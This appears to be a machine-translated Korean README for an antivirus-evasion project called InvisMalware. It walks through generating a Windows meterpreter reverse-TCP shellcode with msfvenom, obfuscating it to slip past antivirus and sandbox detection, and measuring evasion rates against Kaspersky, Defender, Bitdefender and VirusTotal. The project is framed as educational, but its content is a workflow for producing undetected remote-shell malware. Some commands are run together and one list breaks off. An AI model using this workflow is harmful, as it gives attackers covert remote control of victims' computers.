Invismalware는 안티 바이러스 탐지를 우회하는 고급 맬웨어 회피 기술을 보여주기 위해 설계된 프로젝트입니다. 이 연구 중심의 맬웨어 실험은 정적 및 동적 맬웨어 탐지를 피하기 위해 코드 수정 및 방지 박스 전략과 같은 난독 화 방법을 활용하는 데 중점을 둡니다.
이 프로젝트는 악의적 인 행위자들이 사용하는 회피 기술로부터 학습함으로써 현대 악성 코드 방어 전략에 대한 통찰력을 제공하기위한 교육 목적으로 만 사용됩니다.
시작하려면 저장소를 복제하고 필요한 종속성을 설치하십시오.
git clone https://github.com/mawg0ud/InvisMalware.git
cd InvisMalwarepip install -r requirements.txtMSFVENOM을 사용하여 역 TCP ShellCode를 생성하십시오.
msfvenom -p windows/meterpreter/reverse_tcp LHOST= < your_ip > LPORT= < your_port > -f c > evilexp.c evilexp.c 파일을 편집하여 코드를 난독 화하고 탐지를 피하십시오.
안전하고 고립 된 가상 머신에 맬웨어를 배치하여 동작을 테스트하고 탐지율을 측정하십시오.
여러 안티 바이러스 엔진에서 회피율을 평가하려면 맬웨어를 virustotal에 업로드하십시오.
이 프로젝트는 맬웨어 회피를 달성하기 위해 4 단계 방법론을 따릅니다.
Kaspersky , Windows Defender 또는 Bitdefender 와 같은 바이러스 백신 소프트웨어가 장착 된 가상 머신에서 맬웨어를 실행하십시오.
수정 된 맬웨어를 Virustotal 에 업로드하고 얼마나 많은 안티 바이러스 엔진이 성공적으로 감지하는지 확인하십시오.
우리는 프로젝트를 개선하기위한 기여를 환영합니다. 기여하고 싶다면 :
이 프로젝트는 MIT 라이센스에 따라 라이센스가 부여됩니다. 자세한 내용은 라이센스 파일을 참조하십시오.